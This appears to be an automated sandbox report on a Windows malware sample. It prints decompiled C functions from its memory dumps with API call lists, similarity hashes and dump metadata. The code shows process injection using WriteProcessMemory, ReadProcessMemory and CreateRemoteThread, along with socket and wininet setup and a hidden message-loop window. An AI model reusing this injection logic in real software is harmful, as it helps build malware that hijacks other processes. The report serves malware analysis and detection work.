				 *((short*)(_t84 - 0xb4)) = 0x3c;
				E001D3834(_t84 - 0xf4, _t84 - 0xb4, 0x40);
				E001D3864(_t84 - 0x74, _t84 - 0xf4, _t84 - 0xb4);
				 *((intOrPtr*)(_t84 - 0x40)) = E001D3C08;
				 *((intOrPtr*)(_t84 - 0x3c)) = E001D3C9A;
				 *((intOrPtr*)(_t84 - 0x38)) = E001D1C6D;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x34) = _t83;
				 *_t83 = 0x238;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x28)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t73 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E001D1722(E001D2997), _t83, 4, _t84 - 0x2c);
					 *(_t84 - 0x1c) = _t73;
					if(_t73 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *((intOrPtr*)(_t84 - 0x24)) = E001D17D0;
				_t78 = E001D1CFD;
				_t56 =  *((intOrPtr*)(_t83 + 0x6c)) - 3;
				if(_t56 == 0) {
					L7:
					_t78 = 0;
					goto L8;
				} else {
					if(_t56 != 1) {
						L8:
						_t76 = _t83 + 0x1bc8;
						if(E001D1E99(_t83, _t83 + 0x1bc8, _t78, 2) == 0 || E001D1E99(_t83, _t83 + 0x78,  *((intOrPtr*)(_t84 - 0x24)), 1) == 0) {
							L17:
							return E001D173E(E001D38F2(_t84 - 0x74));
						} else {
							 *(_t84 - 4) = 0;
							if( *((intOrPtr*)(_t84 - 0x28)) == 0) {
								E001D2F13(_t76, 0);
							}
							if( *(_t84 - 0x1c) == 0) {
								do {
									_push(_t84 - 0x74);
									__eflags = E001D2522(0, _t83, __eflags);
								} while (__eflags != 0);
								goto L16;
							} else {
								ResumeThread( *(_t84 - 0x1c));
								WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
								CloseHandle( *(_t84 - 0x1c));
								L16:
								 *(_t84 - 4) =  *(_t84 - 4) | 0xffffffff;
								goto L17;
							}
						}
					}
					 *((intOrPtr*)(_t84 - 0x24)) = 0;
					goto L7;
				}
			}








0x001d27e6
0x001d27eb
0x001d27f0
0x001d27f7
0x001d27fa
0x001d27fd
0x001d280a
0x001d2817
0x001d281c
0x001d2835
0x001d284c
0x001d2851
0x001d2858
0x001d285f
0x001d2866
0x001d2869
0x001d286c
0x001d2872
0x001d287c
0x001d2887
0x001d288e
0x001d28ac
0x001d28b2
0x001d28b7
0x001d28b9
0x001d28b9
0x001d28b7
0x001d28c0
0x001d28c7
0x001d28cf
0x001d28d2
0x001d28da
0x001d28da
0x00000000
0x001d28d4
0x001d28d5
0x001d28dc
0x001d28dc
0x001d28ee
0x001d2954
0x001d2962
0x001d2903
0x001d2903
0x001d2909
0x001d290d
0x001d290d
0x001d2915
0x001d293a
0x001d293d
0x001d2943
0x001d2943
0x00000000
0x001d2917
0x001d291a
0x001d2929
0x001d2932
0x001d2950
0x001d2950
0x00000000
0x001d2950
0x001d2915
0x001d28ee
0x001d28d7
0x00000000
0x001d28d7

APIs
  • GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808
    • Part of subcall function 001D3864: GetVersion.KERNEL32 ref: 001D3881
  • GetStdHandle.KERNEL32(000000F6), ref: 001D2880
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC
    • Part of subcall function 001D1E99: InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
    • Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
    • Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
    • Part of subcall function 001D1E99: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
    • Part of subcall function 001D1E99: SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E
  • CloseHandle.KERNEL32(?), ref: 001D2932
    • Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
    • Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
    • Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C
  • ResumeThread.KERNEL32(?), ref: 001D291A
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 5
  • API ID: CreateThreadGetCurrentThreadIdLocalAllocPeekMessagePostMessageSetThreadPriorityWSACleanupWSAStartup
  • String ID:
  • API String ID: 2542947916-0
  • Opcode ID: 2b16ed5e52240c4d80d8b10e68765e774bd0f7290044ab9ce1d8eea53ab31f33
  • Instruction ID: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2
  • Opcode Fuzzy Hash: E9014C02028CA5E7D0272B911CAA73B6042FF41FFCF9DA79271FC691C16F8596196F41
  • Instruction Fuzzy Hash: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2
C-Code - Quality: 91%
			E001D2648(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t42;
				void* _t54;
				void* _t56;
				void* _t63;
				void* _t65;
				void** _t71;
				void* _t75;
				void* _t76;

				_push(0x244);
				_push(0x1d13a0);
				E001D1637(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				E001D384D(_t76 - 0xa8, 0, 0x80);
				 *((intOrPtr*)(_t76 - 0x20)) = 5;
				while(1) {
					L1:
					 *(_t76 - 0x24) = 0;
					 *((intOrPtr*)(_t76 - 0x20)) =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					_t42 =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					if(_t42 == 0) {
						break;
					}
					_t56 = _t42 - 1;
					if(_t56 == 0) {
						_t69 =  *((intOrPtr*)(_t76 + 8));
						_t13 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 2; // 0x0
						if(E001D2CC7(_t76 - 0xa8,  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 6, _t13,  *((intOrPtr*)(_t69 + 4))) <= 0) {
							L14:
							E001D15A3(_t76 - 0xa8);
							while( *((intOrPtr*)(_t76 - 0x1c)) != 0) {
								 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
								 *(_t76 - 4) = 0;
								L001D32DA();
								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
							}
							return E001D173E(PostMessageA( *0x1d50c0, 0x400, 1, 2));
						}
						if(PeekMessageA(_t76 - 0xc4, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
						goto L14;
					}
					_t63 = _t56 - 1;
					if(_t63 == 0) {
						continue;
					}
					if(_t63 != 1) {
						goto L14;
					}
					_t65 = _t76 - 0x254;
					_push(_t65);
					_push(0x101);
					L001D1454();
					if(_t65 != 0) {
						goto L14;
					}
					 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
				}
				_t75 = LocalAlloc(0x40, 0x4464);
				if(_t75 != 0) {
					 *(_t75 + 0x6c) = 1;
					 *(_t75 + 0x70) =  *(_t75 + 0x70) | 0xffffffff;
					 *(_t75 + 0x5c) =  *(_t75 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t75 + 0x3ba8)) = GetCurrentThreadId();
					_t23 = _t75 + 0x3c58; // 0x3c58
					E001D3834(_t23, _t76 - 0xa8, 0x80);
					 *(_t75 + 0x6c) = 3;
					_t54 = CreateThread(0, 0, E001D3722, _t75, 0, _t76 - 0x28);
					_t26 = _t75 + 0x3ba4; // 0x3ba4
					_t71 = _t26;
					 *_t71 = _t54;
					if(_t54 != 0) {
						 *(_t76 - 0x24) = 1;
						 *((intOrPtr*)(_t76 - 0x74)) = 0;
						SetThreadPriority( *_t71, 0xfffffff1);
					}
				}
				E001D1ABC(_t75,  *(_t76 - 0x24));
				if( *(_t76 - 0x24) != 0) {
					goto L1;
				} else {
					goto L14;
				}
			}











0x001d2648
0x001d264d
0x001d2652
0x001d2659
0x001d266a
0x001d266f
0x001d2676
0x001d2676
0x001d2676
0x001d2679
0x001d267f
0x001d2680
0x00000000
0x00000000
0x001d2682
0x001d2683
0x001d26ad
0x001d26b5
0x001d26cb
0x001d277b
0x001d2782
0x001d2787
0x001d278c
0x001d278f
0x001d2792
0x001d2797
0x001d2797
0x001d27c6
0x001d27c6
0x001d26e6
0x00000000
0x00000000
0x00000000
0x001d26e8
0x001d2685
0x001d2686
0x00000000
0x00000000
0x001d2689
0x00000000
0x00000000
0x001d268f
0x001d2695
0x001d2696
0x001d269b
0x001d26a2
0x00000000
0x00000000
0x001d26a8
0x001d26a8
0x001d26fa
0x001d26fe
0x001d2700
0x001d2707
0x001d270b
0x001d2715
0x001d2723
0x001d272a
0x001d272f
0x001d2743
0x001d2749
0x001d2749
0x001d274f
0x001d2753
0x001d2755
0x001d275c
0x001d2763
0x001d2763
0x001d2753
0x001d276d
0x001d2775
0x00000000
0x00000000
0x00000000
0x00000000

APIs
  • WSAStartup.WSOCK32(00000101,?,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D269B
    • Part of subcall function 001D2CC7: LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
    • Part of subcall function 001D2CC7: GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
    • Part of subcall function 001D2CC7: FreeLibrary.KERNEL32(?), ref: 001D2D3F
    • Part of subcall function 001D2CC7: inet_ntoa.WSOCK32(?), ref: 001D2D5E
    • Part of subcall function 001D2CC7: wsprintfA.USER32 ref: 001D2DBF
  • PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 001D26DE
  • LocalAlloc.KERNEL32(00000040,00004464,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D26F4
  • GetCurrentThreadId.KERNEL32 ref: 001D270F
  • CreateThread.KERNEL32(00000000,00000000,001D3722,00000000,00000000,?), ref: 001D2743
  • SetThreadPriority.KERNEL32(00003BA4,000000F1), ref: 001D2763
    • Part of subcall function 001D1ABC: WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
    • Part of subcall function 001D1ABC: TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
    • Part of subcall function 001D1ABC: CloseHandle.KERNEL32(?), ref: 001D1B0E
    • Part of subcall function 001D1ABC: LocalFree.KERNEL32(?,?), ref: 001D1B15
    • Part of subcall function 001D15A3: FreeLibrary.KERNEL32(00000000), ref: 001D15D1
  • WSACleanup.WSOCK32(?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D2792
  • PostMessageA.USER32(00000400,00000001,00000002), ref: 001D27BB
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandle$SetEvent$DeleteCriticalSectionEnterCriticalSectionWaitForSingleObject
  • String ID:
  • API String ID: 4003875101-0
  • Opcode ID: 04216faaea4ba07e98bcd26563bf42db8e4c0576a096f68bb43e63f5af89c022
  • Instruction ID: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7
  • Opcode Fuzzy Hash: D9E08C43914E1AD0C8A7FDC0082E7061E61B76D1E2E5EC5053282436417F1EE0089F89
  • Instruction Fuzzy Hash: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7
C-Code - Quality: 100%
			E001D19F3(intOrPtr _a4) {
				signed char _t11;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				signed char* _t24;
				void** _t27;
				intOrPtr _t29;
				void* _t30;
				struct _CRITICAL_SECTION* _t32;

				_t29 = _a4;
				_t24 = _t29 + 0x1b44;
				_t11 =  *_t24;
				if((_t11 & 0x00000001) != 0) {
					_t32 = _t29 + 0x1b18;
					 *_t24 = _t11 & 0x000000fe;
					EnterCriticalSection(_t32);
					_t13 =  *(_t29 + 0x1b40);
					if(_t13 != 0) {
						SetEvent(_t13);
					}
					_t14 =  *(_t29 + 0x1b10);
					if(_t14 != 0) {
						SetEvent(_t14);
					}
					_t27 = _t29 + 0x1b0c;
					_t15 =  *_t27;
					if(_t15 != 0) {
						WaitForSingleObject(_t15, 0x7d0);
						CloseHandle( *_t27);
						 *_t27 =  *_t27 & 0x00000000;
					}
					_t16 =  *(_t29 + 0x1b40);
					if(_t16 != 0) {
						_t16 = CloseHandle(_t16);
					}
					_t30 =  *(_t29 + 0x1b10);
					if(_t30 != 0) {
						_t16 = CloseHandle(_t30);
					}
					DeleteCriticalSection(_t32);
					return _t16;
				}
				return _t11;
			}













0x001d19f4
0x001d19f8
0x001d19fe
0x001d1a02
0x001d1a09
0x001d1a10
0x001d1a12
0x001d1a18
0x001d1a26
0x001d1a29
0x001d1a29
0x001d1a2b
0x001d1a33
0x001d1a36
0x001d1a36
0x001d1a3e
0x001d1a44
0x001d1a48
0x001d1a50
0x001d1a58
0x001d1a5a
0x001d1a5a
0x001d1a5d
0x001d1a65
0x001d1a68
0x001d1a68
0x001d1a6a
0x001d1a72
0x001d1a75
0x001d1a75
0x001d1a78
0x00000000
0x001d1a80
0x001d1a82

APIs
  • EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
  • SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
  • SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
  • WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
  • CloseHandle.KERNEL32(?), ref: 001D1A58
  • CloseHandle.KERNEL32(?), ref: 001D1A68
  • CloseHandle.KERNEL32(?), ref: 001D1A75
  • DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CreateWindowExDispatchMessageGetMessageGetModuleFileNameRegisterClassSetTimerTranslateMessage
  • String ID:
  • API String ID: 1289143423-0
  • Opcode ID: a48adf90a0f1ca95f9f8ccd3f9eb1397de436c8d144647db204e4c52001b9e96
  • Instruction ID: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c
  • Opcode Fuzzy Hash: ABE0D843065850B3DC4B75752C0C31787917BC9ECAC9C67093056F4248CB87A61CEF43
  • Instruction Fuzzy Hash: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c
C-Code - Quality: 81%
			E001D2C05(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				signed int _t15;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x1d13f0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x1d5044; // 0x1d0000
				 *0x001D50DC = _t11;
				_t30 = _t35 - 0x138;
				 *0x001D50F0 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x1d50cc);
				 *0x1d50c0 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0);
				_t15 =  *0x1d506c; // 0x0
				asm("sbb eax, eax");
				SetTimer( *0x1d50c0, 0x64, ( ~_t15 & 0xffff1d70) + 0xea60, 0);
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34);
				}
				 *0x1d50c0 = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E001D173E(0);
			}







0x001d2c05
0x001d2c0a
0x001d2c0f
0x001d2c16
0x001d2c21
0x001d2c26
0x001d2c36
0x001d2c3c
0x001d2c49
0x001d2c4f
0x001d2c5b
0x001d2c61
0x001d2c68
0x001d2c7d
0x001d2c83
0x001d2c98
0x001d2ca2
0x001d2ca2
0x001d2caa
0x001d2cb9
0x001d2cc4

APIs
  • GetModuleFileNameA.KERNEL32(001D0000,?,00000103,001D50CC,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,001D0000,00000000), ref: 001D2C49
  • RegisterClassA.USER32 ref: 001D2C4F
  • CreateWindowExA.USER32 ref: 001D2C55
  • SetTimer.USER32(00000064,-0000EA60,00000000), ref: 001D2C7D
  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D2C8A
  • TranslateMessage.USER32(?), ref: 001D2C98
  • DispatchMessageA.USER32(?), ref: 001D2CA2
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: ExitThreadGetStdHandleLocalAllocLocalFreeReadProcessMemoryWriteProcessMemory
  • String ID:
  • API String ID: 3806972562-0
  • Opcode ID: d136b9818d58650d9e75ef7e59085fa17e81dc101a90658f0749166ad6ebe984
  • Instruction ID: fbdfbd466d78e4125f2339b7d6edc0ae403b586f458be2afe4e561cdaceb8fd3
  • Opcode Fuzzy Hash: 17E04F44158F6AE1912A79441A0F72B9014BFD7BF9C0C0B37B138315C11B5E751A6B05
  • Instruction Fuzzy Hash: fbdfbd466d78e4125f2339b7d6edc0ae403b586f458be2afe4e561cdaceb8fd3
C-Code - Quality: 74%
			E001D2997() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				_push(0x10);
				_push(0x1d13c0);
				E001D1637(_t40, _t43, _t45);
				 *(_t47 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t44 = GetStdHandle(0xfffffff4);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				if( *(_t47 - 0x1c) != 0) {
					_push(_t47 - 0x20);
					_t41 = 4;
					_t46 =  *(_t47 + 8);
					if(WriteProcessMemory(_t44, _t46 + 0x84, _t47 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t44, _t46,  *(_t47 - 0x1c), 0x78, _t47 - 0x20) != 0) {
						 *( *(_t47 - 0x1c) + 0x6c) = _t41;
						 *( *(_t47 - 0x1c) + 0x70) =  *( *(_t47 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t47 - 0x1c) + 0x370c) =  *( *(_t47 - 0x1c) + 0x370c) | _t41;
						 *( *(_t47 - 0x1c) + 0x1bd4) = _t46;
						E001D27E6(_t41, _t42, _t44, _t46,  *( *(_t47 - 0x1c) + 0x370c),  *(_t47 - 0x1c));
					}
					LocalFree( *(_t47 - 0x1c));
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				ExitThread(0);
			}











0x001d2997
0x001d2999
0x001d299e
0x001d29b0
0x001d29bb
0x001d29bd
0x001d29c5
0x001d29ca
0x001d29cd
0x001d29d3
0x001d29e6
0x001d2a00
0x001d2a06
0x001d2a0d
0x001d2a16
0x001d2a1f
0x001d2a1f
0x001d2a27
0x001d2a27
0x001d2a36
0x001d2a3c

APIs
  • LocalAlloc.KERNEL32(00000040,00004464,001D13C0,00000010), ref: 001D29AA
  • GetStdHandle.KERNEL32(000000F4), ref: 001D29B5
  • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 001D29DE
  • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 001D29F3
    • Part of subcall function 001D27E6: GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808
    • Part of subcall function 001D27E6: GetStdHandle.KERNEL32(000000F6), ref: 001D2880
    • Part of subcall function 001D27E6: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC
    • Part of subcall function 001D27E6: ResumeThread.KERNEL32(?), ref: 001D291A
    • Part of subcall function 001D27E6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929
    • Part of subcall function 001D27E6: CloseHandle.KERNEL32(?), ref: 001D2932
  • LocalFree.KERNEL32(00000000), ref: 001D2A27
  • ExitThread.KERNEL32 ref: 001D2A3C
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 3
  • API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects
  • String ID: !$@
  • API String ID: 3598368018-1106925043
  • Opcode ID: 94e025a43e91df62a48eb6b8a64d63848b0e0c680d25aaeca4969afcd1c9ee64
  • Instruction ID: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
  • Opcode Fuzzy Hash: CCD0A700DE1DC65871531046B5E47F3F1049F121CED5C379532992CB0C4B257038A241
  • Instruction Fuzzy Hash: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
C-Code - Quality: 33%
			E00403020(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				int _t13;
				DWORD* _t18;
				intOrPtr _t22;

				_t18 = _a20;
				_t22 = _a16;
				_v12 = 0;
				_v8 = _t22;
				 *_t18 = 0;
				_t13 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t13;
				if(_t13 != 0) {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t22 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t18);
						}
					} else {
						 *_t18 = 1;
					}
					_t13 = CloseHandle(_v12);
				}
				return _t13;
			}








0x00403026
0x0040302b
0x00403035
0x0040303b
0x00403043
0x00403045
0x0040304d
0x00403050
0x00403055
0x00403061
0x00403066
0x00403067
0x00403068
0x0040306e
0x0040306a
0x0040306a
0x0040306a
0x00403078
0x0040307e
0x0040307e
0x00403057
0x00403057
0x00403057
0x00403087
0x00403087
0x00403091

APIs
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
  • GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
  • CloseHandle.KERNEL32(?), ref: 00403087
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CreateEvent$CreateThreadInitializeCriticalSectionSetThreadPriority
  • String ID:
  • API String ID: 1443725771-0
  • Opcode ID: cc963cedaaa8c141a90b6ba0a701b58c993f7297ed142496386f8b666d6d3d38
  • Instruction ID: 1c04ac80769ce1897cd6b8eb1393fb0302c44cedc3ed2add9cab6c9954ae0cc1
  • Opcode Fuzzy Hash: B6E0DF84A25A4FC5C437E090203F77BA4207B0E9CADDC8521308F1AFA6BF08D406AB08
  • Instruction Fuzzy Hash: 1c04ac80769ce1897cd6b8eb1393fb0302c44cedc3ed2add9cab6c9954ae0cc1
C-Code - Quality: 100%
			E001D1E99(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t26;
				void* _t29;
				void* _t33;
				void* _t41;

				_t41 = _a8;
				_t21 =  *(_t41 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t41 + 0x1b44) = _t21 | 0x00000001;
					_t26 = _a4;
					 *((intOrPtr*)(_t41 + 0x1b48)) = _t26;
					 *((intOrPtr*)(_t41 + 0x1b14)) =  *((intOrPtr*)(_t26 + 0x70));
					InitializeCriticalSection(_t41 + 0x1b18);
					 *((intOrPtr*)(_t41 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t29 = CreateEventA(0, 1, 0, 0);
					 *(_t41 + 0x1b10) = _t29;
					if( *((intOrPtr*)(_t41 + 0x1b40)) == 0 || _t29 == 0) {
						L6:
						E001D19F3(_t41);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t41 + 0x1b0c), _a16);
						} else {
							_t33 = CreateThread(0, 0, _a12, _t41, 0,  &_a8);
							 *(_t41 + 0x1b0c) = _t33;
							if(_t33 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return 0;
			}








0x001d1e9d
0x001d1ea0
0x001d1ea8
0x001d1eb0
0x001d1eb6
0x001d1ebd
0x001d1ecb
0x001d1ed1
0x001d1eeb
0x001d1ef1
0x001d1ef9
0x001d1eff
0x001d1f36
0x001d1f37
0x001d1f05
0x001d1f08
0x001d1f25
0x001d1f2e
0x001d1f0a
0x001d1f15
0x001d1f1d
0x001d1f23
0x00000000
0x00000000
0x00000000
0x00000000
0x001d1f23
0x001d1f08
0x001d1f3d
0x001d1f4b

APIs
  • InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
  • SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E
    • Part of subcall function 001D19F3: EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
    • Part of subcall function 001D19F3: SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
    • Part of subcall function 001D19F3: SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
    • Part of subcall function 001D19F3: WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
    • Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A58
    • Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A68
    • Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A75
    • Part of subcall function 001D19F3: DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadGetStdHandleWaitForSingleObject
  • String ID:
  • API String ID: 1527658926-0
  • Opcode ID: 7410b3e9b634f2cff0a98ddadfc08129967f86c080f8268996739ca556ef27d6
  • Instruction ID: 6c9db9ca0fa4e0924711bf0fce69b9ac659a614394427811d75d21b82a4ad083
  • Opcode Fuzzy Hash: 6FC012804A5C0AB20527F0083D5D3060355AD112D146C7331715849542DF5CB269FF87
  • Instruction Fuzzy Hash: 6c9db9ca0fa4e0924711bf0fce69b9ac659a614394427811d75d21b82a4ad083
C-Code - Quality: 100%
			E001D1BAA(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E001D1722(E001D2165), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}







0x001d1baf
0x001d1bb6
0x001d1bdd
0x001d1be1
0x001d1be6
0x001d1bf1
0x001d1bf8
0x001d1bf8
0x001d1c03

APIs
  • GetStdHandle.KERNEL32(000000F4), ref: 001D1BB6
  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 001D1BD7
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001D1BE6
